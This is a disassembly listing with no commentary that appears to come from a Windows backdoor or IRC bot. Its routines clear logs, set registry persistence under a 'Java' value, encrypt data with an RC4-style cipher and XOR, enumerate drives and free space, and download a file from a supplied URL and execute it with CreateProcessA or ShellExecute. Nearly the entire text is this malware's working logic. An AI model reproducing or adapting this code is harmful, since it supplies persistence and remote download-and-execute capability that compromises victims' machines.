mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_404783
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4010D2
add esp, 14h
loc_404783: ; CODE XREF: sub_40474C+1F�j
push esi
call sub_401014
pop ecx
pop esi
retn
sub_40474C endp
; ---------------------------------------------------------------------------
db 10h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40479C: ; CODE XREF: .text:00401361�j
push esi
mov esi, offset dword_438E6C
loc_4047A2: ; CODE XREF: .text:004047C3�j
cmp byte ptr [esi], 0
jz short loc_4047B7
push dword ptr [esp+8]
push esi
call sub_40121C
pop ecx
test eax, eax
pop ecx
jnz short loc_4047C9
loc_4047B7: ; CODE XREF: .text:004047A5�j
add esi, 80h
cmp esi, offset dword_43CE6C
jl short loc_4047A2
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4047C9: ; CODE XREF: .text:004047B5�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_4047DA: ; CODE XREF: .text:loc_40114A�j
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+8]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp-11Ch]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp-10h], edx
mov dword ptr [ebp-8], 80h
mov [ebp-4], edx
mov [eax+110h], edi
jnz short loc_40482D
push edx
lea eax, [ebp-118h]
push dword ptr [ebp-14h]
push offset dword_42B7E8
push eax
push dword ptr [ebp-11Ch]
call sub_4010D2
add esp, 14h
loc_40482D: ; CODE XREF: .text:0040480D�j
cmp byte ptr [ebp-98h], 0
jz short loc_40484D
lea eax, [ebp-98h]
push eax
call sub_416CCF
test eax, eax
pop ecx
mov [ebp-4], eax
jz short loc_40484D
mov [ebp-8], eax
loc_40484D: ; CODE XREF: .text:00404834�j
; .text:00404848�j
and dword ptr [ebp+8], 0
mov esi, offset dword_438E6C
loc_404856: ; CODE XREF: .text:004048AE�j
mov eax, [ebp+8]
cmp eax, [ebp-8]
jge short loc_4048B0
cmp byte ptr [esi], 0
jz short loc_40489F
cmp byte ptr [ebp-98h], 0
jz short loc_404885
cmp dword ptr [ebp-4], 0
jnz short loc_404885
lea eax, [ebp-98h]
push eax
push esi
call sub_40121C
pop ecx
test eax, eax
pop ecx
jz short loc_40489F
loc_404885: ; CODE XREF: .text:0040486A�j
; .text:00404870�j
push edi
lea eax, [ebp-118h]
push dword ptr [ebp-14h]
push esi
push eax
push dword ptr [ebp-11Ch]
call sub_4010D2
add esp, 14h
loc_40489F: ; CODE XREF: .text:00404861�j
; .text:00404883�j
inc dword ptr [ebp+8]
add esi, 80h
cmp esi, offset dword_43CE6C
jl short loc_404856
loc_4048B0: ; CODE XREF: .text:0040485C�j
lea eax, [ebp-31Ch]
push offset dword_42B7BC
push eax
call sub_416821
xor esi, esi
pop ecx
cmp [ebp-10h], esi
pop ecx
jnz short loc_4048EA
push esi
lea eax, [ebp-31Ch]
push dword ptr [ebp-14h]
push eax
lea eax, [ebp-118h]
push eax
push dword ptr [ebp-11Ch]
call sub_4010D2
add esp, 14h
loc_4048EA: ; CODE XREF: .text:004048C8�j
lea eax, [ebp-31Ch]
push eax
call sub_401014
push dword ptr [ebp-18h]
call sub_4012A3
pop ecx
pop ecx
push esi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
; ---------------------------------------------------------------------------
db 4Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404954 proc near ; CODE XREF: sub_4012FD�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_42B810
xor esi, esi
mov ebx, offset aJava ; "Java"
loc_404967: ; CODE XREF: sub_404954+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_491610 ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_4049A1
push [ebp+arg_0]
call sub_4158E0
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_491680 ; RegSetValueExA
jmp short loc_4049AB
; ---------------------------------------------------------------------------
loc_4049A1: ; CODE XREF: sub_404954+2F�j
push ebx
push [ebp+var_4]
call dword_4915C8 ; RegDeleteValueA
loc_4049AB: ; CODE XREF: sub_404954+4B�j
push [ebp+var_4]
call dword_491638 ; RegCloseKey
add edi, 8
cmp edi, offset dword_42B828
jl short loc_404967
pop edi
pop esi
pop ebx
leave
retn
sub_404954 endp
; ---------------------------------------------------------------------------
db 1Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4049E0 proc near ; CODE XREF: sub_401019�j
; sub_4049E0+16�j
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4012FD
pop ecx
push dword_42B808
call ds:dword_495324 ; Sleep
jmp short sub_4049E0
sub_4049E0 endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4049FE proc near ; CODE XREF: sub_4011F9�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_404A33
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_404A17: ; CODE XREF: sub_4049FE+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_427098[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_404A17
pop edi
pop ebx
loc_404A33: ; CODE XREF: sub_4049FE+E�j
mov eax, esi
pop esi
not eax
retn
sub_4049FE endp
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404A47 proc near ; CODE XREF: sub_4012B7�j
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_415CF8
mov [esp+10h+var_10], offset dword_42B830
push [esp+10h+arg_0]
mov esi, eax
call sub_417012
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_404A96
loc_404A6C: ; CODE XREF: sub_404A47+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_404A9A
inc ebx
push ebx
push esi
call sub_416ED2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_404A96
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_416DEA
add esp, 10h
jmp short loc_404A6C
; ---------------------------------------------------------------------------
loc_404A96: ; CODE XREF: sub_404A47+23�j
; sub_404A47+39�j
xor eax, eax
jmp short loc_404AB5
; ---------------------------------------------------------------------------
loc_404A9A: ; CODE XREF: sub_404A47+29�j
dec ebx
push ebx
push esi
call sub_4011F9
push esi
mov ebx, eax
call sub_415D6C
push edi
call sub_416D94
add esp, 10h
mov eax, ebx
loc_404AB5: ; CODE XREF: sub_404A47+51�j
pop edi
pop esi
pop ebx
retn
sub_404A47 endp
; ---------------------------------------------------------------------------
db 1Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_404AD5: ; CODE XREF: .text:0040106E�j
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
lea eax, [ebp-34h]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov byte ptr [ebp-34h], 0Ah
mov byte ptr [ebp-33h], 0Eh
mov byte ptr [ebp-32h], 20h
mov byte ptr [ebp-31h], 48h
mov byte ptr [ebp-30h], 0Bh
mov byte ptr [ebp-2Fh], 2Bh
mov byte ptr [ebp-2Eh], 0Ch
mov byte ptr [ebp-2Dh], 23h
mov byte ptr [ebp-2Ch], 3Ah
mov byte ptr [ebp-2Bh], 27h
mov byte ptr [ebp-2Ah], 28h
mov byte ptr [ebp-29h], 5Eh
mov byte ptr [ebp-28h], 2Ah
mov byte ptr [ebp-27h], 1Eh
mov byte ptr [ebp-26h], 2Dh
mov byte ptr [ebp-25h], 5Ah
mov byte ptr [ebp-24h], 1Bh
mov byte ptr [ebp-23h], 0Fh
mov byte ptr [ebp-22h], 4Ch
mov byte ptr [ebp-21h], 44h
mov byte ptr [ebp-20h], 16h
mov byte ptr [ebp-1Fh], 4
mov byte ptr [ebp-1Eh], 57h
mov byte ptr [ebp-1Dh], 23h
mov byte ptr [ebp-1Ch], 11h
mov byte ptr [ebp-1Bh], 53h
mov byte ptr [ebp-1Ah], 38h
mov byte ptr [ebp-19h], 13h
mov byte ptr [ebp-18h], 0Dh
mov byte ptr [ebp-17h], 12h
mov byte ptr [ebp-16h], 25h
mov byte ptr [ebp-15h], 1Ch
mov byte ptr [ebp-14h], 30h
mov byte ptr [ebp-13h], 12h
mov byte ptr [ebp-12h], 50h
mov byte ptr [ebp-11h], 4Fh
mov byte ptr [ebp-10h], 39h
mov byte ptr [ebp-0Fh], 10h
mov byte ptr [ebp-0Eh], 42h
mov byte ptr [ebp-0Dh], 1Fh
mov byte ptr [ebp-0Ch], 37h
mov byte ptr [ebp-0Bh], 1Dh
mov byte ptr [ebp-0Ah], 41h
mov byte ptr [ebp-9], 55h
mov byte ptr [ebp-8], 2Ch
mov byte ptr [ebp-7], 41h
mov byte ptr [ebp-6], 2Ch
mov byte ptr [ebp-5], 58h
mov [ebp-4], bl
call sub_4158E0
mov esi, 101h
mov [ebp-38h], eax
push esi
lea eax, [ebp-13Ch]
push ebx
push eax
call sub_415CA0
push esi
lea eax, [ebp-240h]
push ebx
push eax
call sub_415CA0
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_404BDF: ; CODE XREF: .text:00404BE9�j
mov [ebp+eax-13Ch], al
inc eax
cmp eax, ecx
jb short loc_404BDF
cmp [ebp+14h], ebx
jz short loc_404C0E
xor eax, eax
loc_404BF2: ; CODE XREF: .text:00404C0A�j
cmp edi, [ebp+14h]
jnz short loc_404BF9
xor edi, edi
loc_404BF9: ; CODE XREF: .text:00404BF5�j
mov edx, [ebp+10h]
mov dl, [edi+edx]
inc edi
mov [ebp+eax-240h], dl
inc eax
cmp eax, ecx
jb short loc_404BF2
jmp short loc_404C28
; ---------------------------------------------------------------------------
loc_404C0E: ; CODE XREF: .text:00404BEE�j
xor esi, esi
loc_404C10: ; CODE XREF: .text:00404C26�j
cmp edi, [ebp-38h]
jnz short loc_404C17
xor edi, edi
loc_404C17: ; CODE XREF: .text:00404C13�j
mov al, [ebp+edi-34h]
inc edi
mov [ebp+esi-240h], al
inc esi
cmp esi, ecx
jb short loc_404C10
loc_404C28: ; CODE XREF: .text:00404C0C�j
mov [ebp+14h], ebx
xor edi, edi
mov eax, 0FFh
loc_404C32: ; CODE XREF: .text:00404C6C�j
mov dl, [ebp+edi-13Ch]
mov ebx, [ebp+14h]
mov cl, [ebp+edi-240h]
lea esi, [ebp+edi-13Ch]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+14h], ecx
cmp edi, 100h
mov bl, [ebp+ecx-13Ch]
lea ecx, [ebp+ecx-13Ch]
mov [esi], bl
mov [ecx], dl
jb short loc_404C32
xor edi, edi
cmp [ebp+0Ch], edi
mov [ebp+14h], edi
mov [ebp+10h], edi
jbe short loc_404CCA
loc_404C7B: ; CODE XREF: .text:00404CC8�j
inc edi
and edi, eax
mov dl, [ebp+edi-13Ch]
lea ecx, [ebp+edi-13Ch]
mov bl, dl
add ebx, [ebp+14h]
and ebx, eax
mov esi, ebx
mov bl, [ebp+esi-13Ch]
mov [ebp+14h], esi
mov [ecx], bl
lea esi, [ebp+esi-13Ch]
mov ebx, [ebp+10h]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+8]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx-13Ch]
xor [esi], cl
inc ebx
cmp ebx, [ebp+0Ch]
mov [ebp+10h], ebx
jb short loc_404C7B
loc_404CCA: ; CODE XREF: .text:00404C79�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 7Eh dup(0CCh)
; ---------------------------------------------------------------------------
loc_404D4D: ; CODE XREF: sub_40104B�j
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp-2CCh]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp-248h]
push esi
push eax
push dword_49160C
call dword_49156C ; InternetOpenUrlA
cmp eax, esi
mov [ebp-18h], eax
jz loc_4051D9
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp-148h]
push 40000000h
push eax
call ds:dword_495360 ; CreateFileA
cmp eax, edi
mov [ebp-20h], eax
jnb short loc_404E14
lea eax, [ebp-148h]
push eax
lea eax, [ebp-510h]
push offset unk_42BACC
push eax
call sub_416821
add esp, 0Ch
cmp [ebp-30h], esi
jnz short loc_404DF7
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
add esp, 14h
loc_404DF7: ; CODE XREF: .text:00404DD5�j
lea eax, [ebp-510h]
push eax
call sub_401014
push dword ptr [ebp-48h]
call sub_4012A3
pop ecx
pop ecx
push esi
call ds:dword_495334 ; ExitThread
loc_404E14: ; CODE XREF: .text:00404DB5�j
xor edi, edi
call ds:dword_495340 ; GetTickCount
mov ebx, 7D000h
mov [ebp-4], eax
push ebx
call sub_415CF8
pop ecx
mov [ebp-1Ch], eax
loc_404E2E: ; CODE XREF: .text:00404F01�j
push 200h
lea eax, [ebp-510h]
push esi
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+8]
push eax
lea eax, [ebp-510h]
push 200h
push eax
push dword ptr [ebp-18h]
call dword_491574 ; InternetReadFile
cmp [ebp-34h], esi
jz short loc_404E72
push dword ptr [ebp+8]
lea eax, [ebp-510h]
push eax
call sub_4011EF
pop ecx
pop ecx
loc_404E72: ; CODE XREF: .text:00404E5F�j
lea eax, [ebp-24h]
push esi
push eax
lea eax, [ebp-510h]
push dword ptr [ebp+8]
push eax
push dword ptr [ebp-20h]
call ds:dword_49535C ; WriteFile
cmp edi, ebx
jnb short loc_404EB0
mov eax, ebx
sub eax, edi
cmp eax, [ebp+8]
jbe short loc_404E9A
mov eax, [ebp+8]
loc_404E9A: ; CODE XREF: .text:00404E95�j
push eax
lea eax, [ebp-510h]
push eax
mov eax, [ebp-1Ch]
add eax, edi
push eax
call sub_415960
add esp, 0Ch
loc_404EB0: ; CODE XREF: .text:00404E8C�j
add edi, [ebp+8]
cmp [ebp-3Ch], esi
jz short loc_404EBD
cmp edi, [ebp-3Ch]
ja short loc_404F07
loc_404EBD: ; CODE XREF: .text:00404EB6�j
cmp dword ptr [ebp-44h], 1
mov eax, edi
jz short loc_404ED7
shr eax, 0Ah
push eax
lea eax, [ebp-248h]
push eax
push offset unk_42BA7C
jmp short loc_404EE7
; ---------------------------------------------------------------------------
loc_404ED7: ; CODE XREF: .text:00404EC3�j
shr eax, 0Ah
push eax
lea eax, [ebp-248h]
push eax
push offset unk_42BA34
loc_404EE7: ; CODE XREF: .text:00404ED5�j
mov eax, [ebp-48h]
imul eax, 234h
add eax, offset dword_43E720
push eax
call sub_416821
add esp, 10h
cmp [ebp+8], esi
ja loc_404E2E
loc_404F07: ; CODE XREF: .text:00404EBB�j
cmp [ebp-3Ch], esi
mov dword ptr [ebp-14h], 1
jz short loc_404F5C
cmp edi, [ebp-3Ch]
jz short loc_404F5C
push dword ptr [ebp-3Ch]
lea eax, [ebp-510h]
mov [ebp-14h], esi
push edi
push offset unk_42B9E8
push eax
call sub_416821
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
lea eax, [ebp-510h]
push eax
call sub_401014
add esp, 28h
loc_404F5C: ; CODE XREF: .text:00404F11�j
; .text:00404F16�j
call ds:dword_495340 ; GetTickCount
sub eax, [ebp-4]
xor edx, edx
mov ecx, 3E8h
push dword ptr [ebp-20h]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_495358 ; CloseHandle
push dword ptr [ebp-1Ch]
call sub_415D6C
cmp [ebp-38h], esi
pop ecx
jz short loc_404FE6
lea eax, [ebp-148h]
push eax
call sub_4012B7
cmp eax, [ebp-38h]
pop ecx
jz short loc_404FE6
push dword ptr [ebp-38h]
mov [ebp-14h], esi
push eax
lea eax, [ebp-510h]
push offset unk_42B9AC
push eax
call sub_416821
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
lea eax, [ebp-510h]
push eax
call sub_401014
add esp, 28h
loc_404FE6: ; CODE XREF: .text:00404F8E�j
; .text:00404FA0�j
cmp [ebp-14h], esi
jz loc_405226
cmp dword ptr [ebp-44h], 1
jz loc_4050E1
mov [ebp-8], ebx
mov [ebp-4], esi
fild qword ptr [ebp-8]
push ecx
push ecx
mov [ebp-8], edi
mov [ebp-4], esi
fmul ds:dbl_427568
lea eax, [ebp-148h]
fstp qword ptr [esp]
fild qword ptr [ebp-8]
push eax
push ecx
push ecx
lea eax, [ebp-510h]
fmul ds:dbl_427568
fstp qword ptr [esp]
push offset unk_42B95C
push eax
call sub_416821
add esp, 1Ch
cmp [ebp-30h], esi
jnz short loc_405061
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
add esp, 14h
loc_405061: ; CODE XREF: .text:0040503F�j
lea eax, [ebp-510h]
push eax
call sub_401014
cmp dword ptr [ebp-40h], 1
pop ecx
jnz loc_405226
push 5
push esi
lea eax, [ebp-148h]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_4915D0
cmp [ebp-30h], esi
jnz loc_405226
lea eax, [ebp-148h]
push eax
lea eax, [ebp-510h]
push offset dword_42B924
push eax
call sub_416821
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
lea eax, [ebp-510h]
push eax
call sub_401014
add esp, 24h
jmp loc_405226
; ---------------------------------------------------------------------------
loc_4050E1: ; CODE XREF: .text:00404FF3�j
mov [ebp-8], ebx
mov [ebp-4], esi
fild qword ptr [ebp-8]
push ecx
push ecx
mov [ebp-8], edi
mov [ebp-4], esi
fmul ds:dbl_427568
lea eax, [ebp-148h]
fstp qword ptr [esp]
fild qword ptr [ebp-8]
push eax
push ecx
push ecx
lea eax, [ebp-510h]
fmul ds:dbl_427568
fstp qword ptr [esp]
push offset unk_42B8C8
push eax
call sub_416821
add esp, 1Ch
cmp [ebp-30h], esi
jnz short loc_405149
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
add esp, 14h
loc_405149: ; CODE XREF: .text:00405127�j
lea eax, [ebp-510h]
push eax
call sub_401014
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_415CA0
push 44h
lea eax, [ebp-310h]
pop edi
push edi
push esi
push eax
call sub_415CA0
add esp, 1Ch
mov [ebp-310h], edi
lea eax, [ebp-10h]
mov dword ptr [ebp-304h], offset byte_4370BC
push 1
mov [ebp-2E0h], si
pop edi
push eax
lea eax, [ebp-310h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-148h]
push esi
push eax
push esi
mov [ebp-2E4h], edi
call ds:dword_495354 ; CreateProcessA
cmp eax, edi
jnz short loc_4051CB
call dword_4915BC ; WSACleanup
call sub_401122
push esi
call ds:dword_495350 ; ExitProcess
loc_4051CB: ; CODE XREF: .text:004051B7�j
lea eax, [ebp-148h]
push eax
push offset unk_42B874
jmp short loc_4051E5
; ---------------------------------------------------------------------------
loc_4051D9: ; CODE XREF: .text:00404D92�j
lea eax, [ebp-248h]
push eax
push offset unk_42B834
loc_4051E5: ; CODE XREF: .text:004051D7�j
lea eax, [ebp-510h]
push eax
call sub_416821
add esp, 0Ch
cmp [ebp-30h], esi
jnz short loc_405219
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_4010D2
add esp, 14h
loc_405219: ; CODE XREF: .text:004051F7�j
lea eax, [ebp-510h]
push eax
call sub_401014
pop ecx
loc_405226: ; CODE XREF: .text:00404FE9�j
; .text:00405072�j ...
push dword ptr [ebp-18h]
call dword_491690 ; InternetCloseHandle
push dword ptr [ebp-48h]
call sub_4012A3
pop ecx
push esi
call ds:dword_495334 ; ExitThread
; ---------------------------------------------------------------------------
db 13Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40537B proc near ; CODE XREF: sub_4011EF�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_405397
loc_405387: ; CODE XREF: sub_40537B+1A�j
mov dl, byte_42C952
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_405387
locret_405397: ; CODE XREF: sub_40537B+A�j
retn
sub_40537B endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40539F proc near ; CODE XREF: sub_401005�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_417025
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40539F endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401217�j
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_43DB40
push 0
push edi
call sub_415CA0
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4053E4: ; CODE XREF: sub_4053BF+5B�j
; sub_4053BF+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4170E0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_417070
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_405422
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4053E4
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4053E4
; ---------------------------------------------------------------------------
loc_405422: ; CODE XREF: sub_4053BF+4B�j
dec esi
mov eax, edi
loc_405425: ; CODE XREF: sub_4053BF+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_405434
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_405425
; ---------------------------------------------------------------------------
loc_405434: ; CODE XREF: sub_4053BF+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4053BF endp
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40545D proc near ; CODE XREF: sub_401082�j
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4916BC ; GetDriveTypeA
sub eax, 0
jz short loc_4054A0
dec eax
jz short loc_40549A
dec eax
dec eax
jz short loc_405494
dec eax
jz short loc_40548E
dec eax
jz short loc_405488
dec eax
jz short loc_405482
mov eax, offset word_42BB44
retn
; ---------------------------------------------------------------------------
loc_405482: ; CODE XREF: sub_40545D+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_405488: ; CODE XREF: sub_40545D+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40548E: ; CODE XREF: sub_40545D+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_405494: ; CODE XREF: sub_40545D+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40549A: ; CODE XREF: sub_40545D+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4054A0: ; CODE XREF: sub_40545D+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_40545D endp
; ---------------------------------------------------------------------------
db 12h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054B8 proc near ; CODE XREF: sub_4011BD�j
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_491558
test eax, eax
jz short loc_4054ED
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_4054ED: ; CODE XREF: sub_4054B8+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4054B8 endp
; ---------------------------------------------------------------------------
db 12h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405512 proc near ; CODE XREF: sub_4010AA�j
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_4011BD
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_4055EA
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_4055EA
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_4055EA
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_417160
push edx
push eax
call sub_401217
mov edi, offset aSkb ; "%sKB"
push eax
mov esi, 80h
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_4163D7
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_417160
push edx
push eax
call sub_401217
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_4163D7
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_417160
push edx
push eax
call sub_401217
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_4163D7
add esp, 18h
pop ebx
jmp short loc_405619
; ---------------------------------------------------------------------------
loc_4055EA: ; CODE XREF: sub_405512+2C�j
; sub_405512+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_416821
lea eax, [ebp+var_118]
push esi
push eax
call sub_416821
lea eax, [ebp+var_98]
push esi
push eax
call sub_416821
add esp, 18h
loc_405619: ; CODE XREF: sub_405512+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_405512 endp
; ---------------------------------------------------------------------------
db 46h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405673 proc near ; CODE XREF: sub_401073�j
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_4010AA
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_416B70
add esp, 10h
test eax, eax
jnz short loc_4056E6
push ebx
push ebx
call sub_401082
pop ecx
push eax
push offset unk_42BBAC
lea eax, [ebp+var_500]
push 200h
push eax
call sub_4163D7
add esp, 14h
jmp short loc_40571A
; ---------------------------------------------------------------------------
loc_4056E6: ; CODE XREF: sub_405673+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_401082
pop ecx
push eax
push offset unk_42BB58
lea eax, [ebp+var_500]
